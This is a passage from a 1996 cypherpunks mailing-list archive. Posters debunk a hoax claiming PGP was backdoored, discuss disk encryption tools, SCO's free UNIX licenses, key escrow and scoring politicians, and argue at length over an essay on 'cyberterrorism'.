bDJxdC1bathMcgSw2He/pU+KldModPh3BGGzoQjAlkQPyE/15boDJUrZyW2rKphI
wLWekKCd+1w=
=J/2x
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 29 Aug 1996 02:53:42 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Real or Not ?
In-Reply-To: <199608281157.EAA04520@jobe.shell.portal.com>
Message-ID: <199608281530.IAA20721@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com writes:
> 
> I snagged this off a news group this AM.. comments??

> 
> NSA/FBI/CIA/MJ12...Craig Steingold......Trilateral Commission....
> Bilderberg Committee


Heh.  They forgot the Black Heliocopters manned by agents of
the UN/New World Order, and the Greys from Zeta Reticuli..

It's a hoax, with several clues that it is a hoax in it.

Of course you're welcome to prove me wrong by disassembling
a PGP binary.  Examination of the random numnber generator, IDEA
key setup, or RSA key setup vs what's in the source code
should show if something fishy is going on.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 29 Aug 1996 03:11:27 +0800
To: Scottauge@aol.com
Subject: Re: SCO giving free licenses to UNIX OpenServer
In-Reply-To: <960828080524_511466918@emout19.mail.aol.com>
Message-ID: <199608281537.IAA20774@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Scottauge@aol.com writes:
> 
> Hit www.sco.com
> 
> Pick What's New
> 
> Look for UNIX Unbound.
> 
> Read, Understand, and Delight... Microsoft maybe in trouble at last.


I doubt it.  People don't use Microsoft products because
of their quality or functionality.


> This is for single user home based UNIX systems.


Single-user UNIX isn't all that useful.


Linux and FreeBSD are both free, and come with source code.
You can get "commercial" versions of Linux for around $30
(that's on CDROM).  You can get support for Linux, and probably
for FreeBSD.



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Thu, 29 Aug 1996 03:51:13 +0800
To: cypherpunks@toad.com
Subject: [Noise] Re: SCO giving free licenses to UNIX OpenServer
Message-ID: <2.2.32.19960828163200.00707ea8@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Free evaluation is hardly a threat.

"SCO today announced plans to provide a free license
to use its popular UNIX systems, including SCO OpenServer and SCO UnixWare,
to anyone in the world who wants to use them for
educational and non-commercial use to enable the evaluation and
understanding of UNIX systems."

Hmmmmm. I don't even think that could qualify as a threat to Linux let alone
Microsoft.

The rest of "Unix Unbound" reads like an overpriced, underexperienced
marketeer wetdream filled with empowering bold moves, 20 years of this and
60 billion of that. The comparison with AT&T's similar move 25 years ago is
essential market-speak. Any student of posturing should study this. 

At 08:05 AM 8/28/96 -0400, you wrote:
>Hit www.sco.com
>
>Pick What's New
>
>Look for UNIX Unbound.
>
>Read, Understand, and Delight... Microsoft maybe in trouble at last.
>
>This is for single user home based UNIX systems.
>
>Was announced August 19, don't know how long this is to happen.
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Thu, 29 Aug 1996 04:09:49 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Real or Not ?
In-Reply-To: <199608281157.EAA04520@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9608280946.A18534-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996 anonymous-remailer@shell.portal.com wrote:

> I snagged this off a news group this AM.. comments??
> 
[snip]
> 
>  Since version 2.1, PGP ("Pretty Good Privacy") has been rigged to 
> allow the NSA to easily break encoded messages. Early in 1992, the author, 
> Paul Zimmerman, was arrested by Government agents. He was told that he 

The author of PGP is PHILLIP Zimmermannm not Paul.

This file has been making the rounds for a few years now...it was first 
posted to one of the humor newsgroups, but pops up every now and then on 
one of the more serious places, like here.  It's bogus.

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jseiger@cdt.org (Jonah Seiger)
Date: Thu, 29 Aug 1996 01:58:34 +0800
To: cypherpunks@toad.com
Subject: Re: Scoring Politicians on Digital Liberty Issues (Re: Net Politics)
Message-ID: <v02140b01ae49f4f77a33@[204.157.127.4]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:38 PM 8/27/96, Timothy C. May wrote:
>(I have no idea where the virtual nexus of this debate is taking place...

  [the 'virtual nexus' of this debate is actually on fight-censorship
   <http://www.eff.org/~declan/fight-censorship/>. Somehow it got cross
   posted to c'punks. Though I know it is annoying, I am cc'ing this to
   c'punks but I will keep all further replies to fight-censorship]

>I think it laudable that CDT has chosen to remain in D.C. to "work within
>the system." Personally, I could never stomach doing this.

Thanks. Sometimes I need to throw back a few bottles of Pepto (or something
a little harder), but working in DC is sometimes rewarding and always
exciting.

<...>

>On the specific issue of whether Sen. Leahy is or is not a "friend of the
>Net," to use him as an example here, I suggest a different approach.
>Instead of classifying Leahy as a friend or an enemy, or Burns as a friend
>or an enemy, etc., why not a *ratings system*?

A very solid suggestion.

I think this is a good idea for a lot of reasons, not the least of which is
that it would help define our issues for the Congress, the Administration,
the press, and the rest of the country. Partly because it's true and partly
because we are not as well organized as we could be, the perception of the
net.community on Capitol Hill is of a less-than-unified body politic.

This idea could help to change that attitude if it is done right.

<...>

>The issues for a scorecard might be accumulated on the Net, with inputs
>from CDT, VTW, EFF, Cypherpunks, and other interested groups. It could be
>messy, but perhaps not. Even a *simple* set of principles, picked by almost
>any of these organizations, would likely be enough to get a reasonable
>scoring system...it's not as if we all don't know that Leahy's support for
>the Digital Telephony Bill was a major downcheck--whatever the realpolitik
>issues were--and that his support of Pro-Code is a major upcheck. The value
>of scoring is that it takes out the often-painful issues of classifying
>politicians as "friends" or "enemies."

I remember 2 years ago (I think?) VTW did something like this.  As I
recall, the only issue was Digital Telephony, and every member of Congress
(save 2 or 3) got an F. IMHO, this was not as effective as it could have
been, but it was a good start.  Our issues are much more front-and-center
than they were in 94, so this time around perhaps such and effort will have
more impact.

As far as I know, VTW is gearing up to do this again, though I haven't
spoken to Shabbir about his plans. If he or anyone else is seriously
considering doing this, I am certainly happy to contribute some time and a
few ideas to the effort.

Jonah

  ** THE FIGHT FOR FREE SPEECH ONLINE CONTINUES TO THE SUPREME COURT **
      It's not too late to be a part of history -- Join the Lawsuit
         <http://www.cdt.org/ciec>   --    <ciec-info@cdt.org>

--
Jonah Seiger, Policy Analyst           Center for Democracy and Technology
<jseiger@cdt.org>                           1634 Eye Street NW, Suite 1100
                                                      Washington, DC 20006
PGP Key via finger                                     (v) +1.202.637.9800
http://www.cdt.org/                                    (f) +1.202.637.0968
http://www.cdt.org/homes/jseiger/








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 29 Aug 1996 04:22:09 +0800
To: "Douglas R. Floyd" <drifter@c2.net>
Subject: Re: File System Encryption
Message-ID: <19960828165105171.AAA175@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 27 Aug 1996 09:01:03 -0500 (CDT), Douglas R. Floyd wrote:

>> I'm aware of the three main disk encryption programs SFS, SECDRV, and
>> SECDEV, but I need to find a solution that works with Windows 95 32bit
>> or Windows NT 4.0.
>> 
>> I'm currently using SFS 1.17 and Secure Drive under Win-95, but am
>> unable to continue to work in dos compatability mode due to severe
>> performance hits.  I am open to commercial products that have passed
>> peer review, but know of none.
>> 
>> If anyone could suggest a solution (outside of switching OS's), I
>> would be *most* gratefull.
>> 
>> Please respond to the list, as I am a subscriber under another
>> account.
>
>If you have another 386 or 486 lying around, you could install Linux and
>Ian's encrypted loopback code on a remote box, then NFS or Samba the
>filesystem over.  For protection, you could modify the vlock command to
>lock the console (and not unlock it), and disable inetd.  Then, unless

Better yet, patch some stuff onto a spare power supply cable so that a small
siren would go off on a reboot and then use those security bolts to hold the
case on.  That would probably discourage someone from rebooting off a floppy.

>someone has the permissions to access the files through the network, the
>files are inaccessable ;-).

Neat idea, and a great use for all the linux security patches we've heard
about.

/ If you think education is expensive, try ignorance.
/ Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
/ Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
/ Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
/ Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@veriweb.com>
Date: Thu, 29 Aug 1996 04:42:38 +0800
To: Scottauge@aol.com
Subject: Re: SCO giving free licenses to UNIX OpenServer
In-Reply-To: <960828080524_511466918@emout19.mail.aol.com>
Message-ID: <Pine.BSI.3.93.960828095701.26350A-100000@descartes.veriweb.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 28 Aug 1996 Scottauge@aol.com wrote:

> Hit www.sco.com
> 
> Pick What's New
> 
> Look for UNIX Unbound.
> 
> Read, Understand, and Delight... Microsoft maybe in trouble at last.
> 

Oh so carefully worded PR BS:

"It also represents the first time in more than 20 years that the owner of 
UNIX technology has provided the operating system free of charge to the 
public"

Note "owner of UNIX technology"

They make it sound like noone without a multimillion dollar budget could
ever get UNIX before. What a crock.

It's good to see them making it free, but there are far better free
system already IMO (Linux, FreeBSD, etc).

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Jeremey Barrett
Senior Software Engineer                        jeremey@forequest.com
The ForeQuest Company                           http://www.forequest.com/

PGP Key fingerprint =  3B 42 1E D4 4B 17 0D 80  DC 59 6F 59 04 C3 83 64
PGP Public Key: http://www.forequest.com/people/jeremey/pgpkey.html
                
		"less is more."  -- Mies van de Rohe.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMiR7gy/fy+vkqMxNAQFPegP/fDvA1APnMMDvOYh2aI/cXBQZQrkQMnT8
rAIB239qzZVbvFPY3iqNvHMlb3M3j+8BkDm+7QkYi5fepPwKgmMsslQy6HAzdAzX
KKPX38zfrPnqmGsrESSJElyKFXrk76w0NGme0UDPAAvPv3uPFZCueZzY/siHiRLe
2d4IEJCIQ0Q=
=yLBM
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 29 Aug 1996 02:46:52 +0800
To: jburrell@crl.com (Jason Burrell)
Subject: Re: File System Encryption
In-Reply-To: <Pine.SUN.3.91.960828042422.29651A-100000@crl.crl.com>
Message-ID: <199608281505.KAA03928@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Jason Burrell wrote:
> 
> On Wed, 28 Aug 1996, Douglas R. Floyd wrote:
> 
> > > I may have to consider this approach. I'll have to look into Ian's system.
> > > Does it pass muster with the crypto gods? (that's meant as a compliment
> > > guys :)
> > 
> > It uses IDEA in a decently secure manner, as well as TDES.  You can also
> > mount .au files as filesystems, and the data will be hidden in the sound
> > file.
> > 
> > (Last place I remember Ian's loop.c and des patches for Linux was on
> > ftp.csua.berkeley.edu, /pub/cypherpunks/<somewhere>)
> > 
> 
> ftp.csua.berkeley.edu:/pub/cypherpunks/filesystems/linux. 

Anyone had any luck with ftp.csua.berkeley.edu? My ftp client says
that "client not responding to commands, hanging up".

What is wrong?

igor

> I haven't looked through the code very hard yet, but I do wonder how the
> passphrase and such is stored. If I run losetup and setup
> /root/stego_file.au as a filesystem on /dev/loop0, does that get stored
> anywhere that isn't secure from non-root processes, or that is kept after
> the filesystem is unmounted? I figure the passphrase definately is removed
> as soon as the filesystem is unmounted, and that this is stored in
> protected kernel memory. 
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Thu, 29 Aug 1996 04:52:52 +0800
To: cypherpunks@toad.com
Subject: Other nations' bad laws and crypto/GAK ...
Message-ID: <199608281734.KAA29678@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


A legal concern about GAK ...

What would be the basis for each and every request for GAK keys from
other nations?  What sort of process would decide which purposes are
okay for which to grant access to GAK keys?

What if it is to enforce this new Malaysian law against Karaoke (say,
because someone was importing karaoke equipment to Malaysia)?  It
seems like we should not be supporting other nations' repressive laws.
Is each and every GAK key to be granted to be carefully reviewed for
concerns on national security/foreign policy/repressive law/stupid
law?  If so, then it seems like a huge government beaurocracy will
have to be created just to handle proper review of GAK requests.

Ern

-------- From Nando Times ...

 CONCERNED MALAYSIAN STATE RULES AGAINST KARAOKE
 
 Copyright (c) 1996 Nando.net
 Copyright (c) 1996 Reuter Information Service 
 
 KUALA LUMPUR (Aug 28, 1996 10:35 a.m. EDT) - Citing concerns about
 moral decay, the central Malaysian state of Selangor will close all
 illegal video games outlets and karaoke lounges from September 1, the
 national Bernama news agency reported on Wednesday.
 
 Licensed video games arcades will also be closed on expiry of their
 licences while the licensing conditions for karaoke lounges have been
 tightened, Bernama quoted Selangor's Chief Minister Muhammad Muhamad
 Taib as saying.
 
 As in many Asian countries, karaoke has become a popular recreation,
 resulting the mushrooming of lounges in many of Malaysia's
 cities. Officially Moslem Malaysia is vigilant for any erosion of
 moral standards among its youth.
 
  ... [ SNIP ] ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Thu, 29 Aug 1996 03:35:46 +0800
To: ichudov@algebra.com
Subject: Re: File System Encryption
In-Reply-To: <199608281505.KAA03928@manifold.algebra.com>
Message-ID: <199608281536.KAA07426@bermuda.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Jason Burrell wrote:
> > 
> > On Wed, 28 Aug 1996, Douglas R. Floyd wrote:
> > 
> > > > I may have to consider this approach. I'll have to look into Ian's system.
> > > > Does it pass muster with the crypto gods? (that's meant as a compliment
> > > > guys :)
> > > 
> > > It uses IDEA in a decently secure manner, as well as TDES.  You can also
> > > mount .au files as filesystems, and the data will be hidden in the sound
> > > file.
> > > 
> > > (Last place I remember Ian's loop.c and des patches for Linux was on
> > > ftp.csua.berkeley.edu, /pub/cypherpunks/<somewhere>)
> > > 
> > 
> > ftp.csua.berkeley.edu:/pub/cypherpunks/filesystems/linux. 
> 
> Anyone had any luck with ftp.csua.berkeley.edu? My ftp client says
> that "client not responding to commands, hanging up".
> 
> What is wrong?
> 
> igor

Try a mirror.  ftp.funet.fi,
/pub/crypt/mirrors/soda/cypherpunks/filesystems/linux.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 29 Aug 1996 05:25:13 +0800
To: cypherpunks@toad.com
Subject: Re: Bullshit or Not ?
Message-ID: <3.0b11.32.19960828102326.00a7a45c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:57 AM 8/28/96 -0700, anonymous-remailer@shell.portal.com wrote:
>I snagged this off a news group this AM.. comments??
>
>A lot of people think that PGP encryption is unbreakable and that the
>NSA/FBI/CIA/MJ12 cannot read their mail. This is wrong, and it can be a
>deadly mistake. In Idaho, a left-wing activist by the name of Craig Steingold
>was arrested  _one day_ before he and others where to stage a protest at
>government buildings; the police had a copy of a message sent by Steingold
>to another activist, a message which had been encrypted with PGP and sent
>through E-mail.

This is quite bogus.  The first clue is the mention of "Craig Stiengold".  A
variation of "Craig Shergold" a widely known (and misspelled) urban legend.

This has been debunked a number of times.
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Thu, 29 Aug 1996 05:17:58 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Real or Not ?
In-Reply-To: <199608281157.EAA04520@jobe.shell.portal.com>
Message-ID: <199608281655.LAA10957@bermuda.io.com>
MIME-Version: 1.0
Content-Type: text/plain


[deletia -- PGP being Trojanized since 2.2]

>From what I heard, it was bad key distrubtion and infiltration which did
the person in, rather than pgp being broken.

If PGP was broken, it would be definitely found by now.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Keith Glass <salgak@dcez.nicom.com>
Date: Thu, 29 Aug 1996 03:42:22 +0800
To: Jonah Seiger <jseiger@cdt.org>
Subject: Re: Scoring Politicians on Digital Liberty Issues (Re: Net Politics)
In-Reply-To: <v02140b01ae49f4f77a33@[204.157.127.4]>
Message-ID: <Pine.BSI.3.91.960828120051.16596A-100000@dcez.nicom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Aug 1996, Jonah Seiger wrote:

> >or an enemy, etc., why not a *ratings system*?
 
> A very solid suggestion.
 
> This idea could help to change that attitude if it is done right.

Suggestions, based on the successful ratings concept I've seen in 
Virginia elections, and a mainstay of groups like the Borg, excuse me, 
the Christian Coalition <g>

Pick 10-20 issues/votes.  Rate each congresscritter AND THEIR OPPONENTS 
based on "our" stand on the issues. Give a numerical score, based on 
percentage of "correct" positions.

Obvious issues are:

digital telephony   the CDA  Encryption/PRO-CODE  copyright, etc. . .

*   Keith A. Glass, Annandale, Virginia, USA, Filker/punster at large   *
*           "Specialization is for insects"   -  Lazarus Long           *
* Worlds saved, virgins converted, bongos taught - special group rates  *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Barry C. Collin" <isi@hooked.net>
Date: Thu, 29 Aug 1996 08:31:06 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: In reference to comments made to me and to the Group
Message-ID: <3224A412.D05@hooked.net>
MIME-Version: 1.0
Content-Type: text/plain


This message was in response to comments made by E. Allen Smith on my recent remarks on cyberterrorism.

Dear Mr. Smith:

Thank you for your perspectives.  Save for the irrelevant flaming, I appreciated your taking time.  
Following are my comments.
  
>>Terrorism to CyberTerrorism
>
>>   The face of terrorism is changing. While the motivations remain the
>>   same, we are now facing new and unfamiliar weapons. The intelligence
>>   systems, tactics, security procedures and equipment that were once
>>   expected to protect people, systems, and nations, are powerless
>>   against this new, and very devastating weapon. Moreover, the methods
>>   of counter-terrorism that our world's specialists have honed over the
>>   years are ineffectual against this enemy. Because, this enemy does not
>>   attack us with truckloads of explosives, nor with briefcases of Sarin
>>   gas, nor with dynamite strapped to the bodies of fanatics. This enemy
>>   attacks us with one's and zero's, at a place we are most vulnerable:
>>   the point at which the _physical _and _virtual _worlds converge. Let
>>   us first define theses two domains.
>
>	Ever since the dawn of technological civilization, we've been vulnerable
>to terrorism inflicted by those with technological knowledge and intelligence.
>Ever since someone discovered how to produce poisonous gases, we've been
>vulnerable to attacks such as those in the Japanese subways. Ever since the
>electrification of countries, we've been vulnerable to attacks on power
>production and distribution systems. Ever since most vehicles became
>petroleum-powered, we've been vulnerable to attacks on petroleum production and
>distribution systems. Ever since we found out how to cultivate anthrax, we've
>been vulnerable to any competent bacteriologist.

These are all different tools.  Some are simple to create and deploy, some are not.  While the definition 
of classical terrorism (and its motivations) remain the same, we must study each of these tools separately 
if we are to understand how to detect, prevent, and respond to the threats.

>	All the above is is Information Super-Highway hype.

Thank you for your opinion.

>[...]
>
>>Achieving CyberTerrorist Goals
>
>>   So how does a CyberTerrorist achieve his mission? Like any terrorist,
>>   a CyberTerrorist actively exploits the goals of the target population
>>   in areas in which they take for granted.
>   
>>   There are three potential acts in CyberTerrorism at the point of
>>   convergence:
>>     * 1.Destruction;
>>     * 2.Alteration; and
>>     * 3.Acquisition and retransmission (these are a unit).
>       
>   I would point out that many instances of the last (I would guess you refer to
>the getting and distribution of, say, ITAR-restricted information - you do
>accuse crackers of complicity in "CyberTerrorism" by breaking military
>security) are not, properly speaking, terrorism; they are instead the
>distribution of information that should not be restricted.

You guessed incorrectly; I'm not talking ITAR.  Test yourself:  Can you think of any sensitive or personal 
information, that if exposed or utilized, could cause terror -- or destabilization?  If you can't, you are 
not trying; you should know more than most the value of privacy, whether it be military, corporate, or 
personal.

>One person's
>terrorist is another person's freedom fighter (I'd call both sides in
>Nicaragua's Sandanista-Contra conflict terrorists).

This nifty statement frequently comes from people who've never seen a child blown up, seen people 
disfigured, seen property damaged beyond all recognition.  Perhaps it is a safe place in your office, Mr. 
Smith, behind your terminal judging other's thoughts.  I don't have that luxury.  I've spent more than 
anyone's fair share of time going through rubble, identifying pieces of what were once people, and telling 
their families.

Freedom fighters who kill random and innocent victims are terrorists and cowards.  If you feel otherwise, 
Mr. Smith, perhaps it is time to step out into harm's way, and then perhaps you too will waken in the 
night with the images that haunt me.  *Then* you can talk to me about such matters.  Until then, stick to 
coding.

>   
>[...]
>   
>>Potential CyberTerrorist Acts
>
>[...]
>
>>     * A CyberTerrorist will attack the next generation of air traffic
>>       control systems, and collide two large civilian aircraft. This is
>>       a realistic scenario, since the CyberTerrorist will also crack the
>>       aircraft's in-cockpit sensors. Much of the same can be done to the
>>       rail lines.
>
>	Only a bloody utter idiot would build such systems without enough
>backups to avoid these problems; they could come about through computer bugs
>or component failures as well. Networked systems are notorious for going down
>(see the recent happenings with AOL, for instance); they're _going_ to have
>backups if anyone intelligent is running them. Of course, you may have a point
>with a government-controlled air traffic controller systems.
>	The same can be said of most of your other scenarios.

These require more than once person be involved.  Do not kid yourself, we are not dealing with stupid 
people here.  And bloody utter idiots we have a-plenty -- too many administrators more concerned with 
their balance sheets to provide the tools people like you need to build safe systems.  You'd be surprised 
of the amount of criminally-inadequate systems out there.  That's why it _is_ important that folks like 
you push the envelope to better the systems.  The goal here, Mr. Smith, is to put me out of business, not 
by flames, but by helping to build better systems.  I think we share that goal.

>
>>CyberTerrorists: Who, Where, and Why?
>
>>   The purpose of this paper is to help you understand the threats that
>>   exist, and hopefully, to help you prevent these types of atrocities.
>>   But know this - there are people out there with very different goals,
>>   who are our real threats, and who are, or will be, attacking us. Make
>>   no mistake, _the threats are real, today___.__
>
>	Most people with technical knowledge have a pretty large motivation to
>keep the technical society going. One, the loss of it would make our knowledge
>useless. Two, we have enough contact with technology and science to want it to
>continue - how many neo-Luddite engineers do you know? The Unabomber is the
>main exception... and even he didn't use his main area of knowledge in his
>bombings.

We are not concerned with engineers.  We are concerned with fanatics, and fanatics are fanatics whether 
they are engineers or gardeners.  Do not be so naive to believe that everyone shares the morals you have. 
Mr. Smith, there are people out there who want you dead, and will use all the techniques you pointed out 
above to accomplish their goal.  As I said before, technology is just another tool.


>>   Who are the CyberTerrorists? There a great many poor movies and too
>>   many works of fiction about the hacker and cracker communities. In the
>>   popular media, there recently was the Kevin Mitnick incident, where
>>   one cracker broke into another cracker's systems. This spawned endless
>>   press and at least two best selling books. While this incident
>>   received much attention, the events amounted to meaningless children's
>>   games.
>
>	I'd agree with that, from what I know of the Mitnick incident(s). I'm
>not sure if Shinomura (sp?) should be called a cracker; others with more
>knowledge can comment on this.

Agreed.

   
>>   By and large, the cracker community, based primarily in the United
>>   States, Europe, the Middle East, Asia, and in the nations of the
>>   former Soviet Union, is composed of individuals who see the cracking
>>   process merely as a challenge, a brain teaser, a puzzle. They view
>>   themselves as not only being innocent of any crime, but perhaps even
>>   doing something righteous, something to counter the dark monoliths of
>>   the corporate and government worlds. They believe they are being
>>   persecuted. These individuals believe that what they are doing is not
>>   doing any true damage. At its least harmful, these crackers just look
>>   at information. However, privacy issues and military secrecy can
>>   render such infiltrations acts of terror.
>
>	Often, military secrecy is just an excuse to not allow information
>damaging to governments, etcetera from getting out. With NSC involvement, how
>deeply do you think the Iran-Contra dealings were classified? I would, however,
>agree with you about privacy issues... but governments are far greater threats
>in this regard than all the crackers in the world. Much of the information in
>question would not be around in so many places (such as notoriously accessible 
>government databanks) except for governments gathering information they
>shouldn't have in the first place.

Whether you are right or wrong about what governments have locked away is not in my work area.  As I've 
said, my work is in fanatics, the disenfranchised, etc.  People are people, and some turn rogue.  It 
happens.  And people are purchased.  My work keeps me entrenched in such mire regularly.
> 
>[...]
>  
>>Crackers as Facilitators
>
>[...]
>
>>   Historically, individuals engaged in the practice of terror tended not
>>   to be people working upon a computer 20 hours per day. Terrorists have
>>   not been in the business of tracking the latest holes found in UNIX or
>>   an obscure government telnet opportunity. There _are _people, however,
>>   who are in that business - for illicit as well as good cause. As
>>   stated, just as indigenous people may be turned into soldiers, so can
>>   crackers be turned into CyberTerrorists. Sometimes such a transition
>>   may be motivated by money or prestige. Usually, this transition will
>>   occur without the cracker's cognizance. The potential threat from such
>>   transitions is mind boggling, considering the damage even one
>>   mis-directed cracker can cause.
>
>	The first statement is correct... and is likely to continue to be the
>case. We would appreciate some evidence for such transitions occurring without
>cognizance, or indeed being at all likelyLet me know what you do for a living, and then we can share more.  Not trying to be "spooky", but 
understand that my piece of the world rests in the violent world, and I need to watch my own back.
>   
>>   Further, as young, educated people are brought into the folds of
>>   terrorist groups, this new generation will have the talent to execute
>>   the acts of CyberTerrorism of which we have spoken.
>
>	Unlikely. For state-sponsored terrorism, for instance, countries with
>the motivation for such are also ones that tend to block people from computer
>experience. Getting on the Internet is rather likely to expose the people in
>such countries to information that will destabilize them... including programs
>such as PGP that are restricted by ITAR in the name of (among other things)
>decreasing terrorism.

You might be interested in the number of "students" attending our universities that have solid terrorism 
backgrounds.  The ones I spoke to made their purpose very clear.

>   
>>   We are going to see increasing levels of in-house expertise, and
>>   concomitant exponential increases CyberTerrorism. Unlike other methods
>>   of terrorism, CyberTerrorism is safe and profitable, and difficult to
>>   counter without the right expertise and understanding of the
>>   CyberTerrorist's mind. Combine our increasing vulnerability, with the
>>   explosive increases in the level of violence, and increasing expertise
>>   available inside terrorist organizations through new blood popular
>>   media, there recently was the Kevin Mitnick incident, where one
>>   cracker broke into another cracker's systems. This spawned endless
>>   press and at least two best selling books. While this incident
>>   received much attention, the events amounted to meaningless children's
>>   games.
>
>	You appear not to be making much sense here, but I'll put it down to
>misformatting.

Yes, there is a block of text missing.  If you have any interest, I can resend.

Exactly how is CyberTerrorism profitable? Certainly, it's
>_possible_ for people to be _hired_ to do things that may enable some form of
>terrorism... but that doesn't make the _terrorism_ any more profitable than
>before.It's more profitable since the cost of entry, and continued operations, are less.  In addition, access to 
financial resources (computer crime) is readily available.  And you don't lose someone after they've been 
blown up.

>
>[...]
>
>>   If a computer security advisor states that you, your organization, and
>>   your country are safe behind firewalls, behind a system put into place
>>   by people who have never fought cyberbattles, behind audit trails,
>>   passwords, and encryption, then a great and dangerous fallacy (or
>>   fantasy) is being perpetrated upon you. The only solution is the quick
>>   deployment of a counter-CyberTerrorist - someone who knows what you
>>   are up against today, someone who lives in the world of the people who
>>   are, and will be, attacking - someone who can train the people who
>>   must fight the battles.
>
>	Passwords and encryption can do a very good job of stopping crackers,
>thank you - that's one major concern for which they're developed.It's all in the implementation, Mr. Smith.  You know that.

>Economic and
>other espionage are very much already on the minds of those suggesting using
>firewalls, passwords, and encryption; they're a lot more experienced, when
>the computer community's expertise is summed up, than you are.Again, just because the tools for protection are there, doesn't mean they are properly implemented.  You 
could not possibly be telling me that everything is locked down safely at this point.  Bottom line, if you 
can make it, someone can break it.  Always has been, always will be.

>	In other words, the above just translates into "give us money." Have some idea of what you speak before you speak, Mr. Smith.  We do not accept funding from the private 
or public sector.  We are all volunteers who research high-intensity crime and low-intensity conflict.  
When I am not volunteering, my job is to make sure you can safely send out your emails without getting 
blown away or blown up.

>  
>>Ex Post Facto
>   
>>   An effective auditing system will only inform the target manager that
>>   they have taken a hit; perhaps a fatal hit. By that point, it is too
>>   late. _Now _is the time to take action. Unfortunately, due to this
>>   open nature of this document, specific counter-CyberTerrorism measures
>>   cannot be discussed. Those discussions must be reserved for secured
>>   facilities.
>
>	Nobody disagrees with that auditing isn't the _only_ method needed;
>_everyone_ uses other methods.Watch your generalizations.  You'd better tune in to how bad things really are.

Remember that old saying about prevention and
>cure?
>	Your claim that you can't discuss security in the open is laughable.
>Quite simply, security by obscurity doesn't work; in cryptography, it's one of
>the signs of "silicon snake-oil" - which is what this document looks like in
>any event. First, making a system obscure motivates a lot of people to try to
>find out how it works; intelligent people are curious, and don't like
>unnecessary secrets unless they're authoritarians. Second, the less people
>know about a system, the less people can spot bugs to be _fixed_ in that
>system. I prefer a system that has been tested by as many people as possible,
>thank you, particularly if my life may depend on it.Again, I'm not worried about you at your keyboard clicking away and offering opinions.  There's more to 
this than encryption.  Take off the blinders, Mr. Smith: encyrption is just one little piece of this 
puzzle.  It comes down to psychology, far more than technology.  I appreciate your curiousity, your wish 
for totally open systems.  In a perfect world, or even a sane world, that would be ideal.  I would love 
society to be filled with people like you who believe in improving the state of the art, the pushing of 
the envelope, etc.

But you are not who I deal with every day.  Unfortunately, just because you don't see these folks, doesn't 
mean they are not there.  They are not the ones with cutesy handles and who send messages to usenets and 
such.  It's the people off the radar screen, the one's that know better than to go public.  I've spent way 
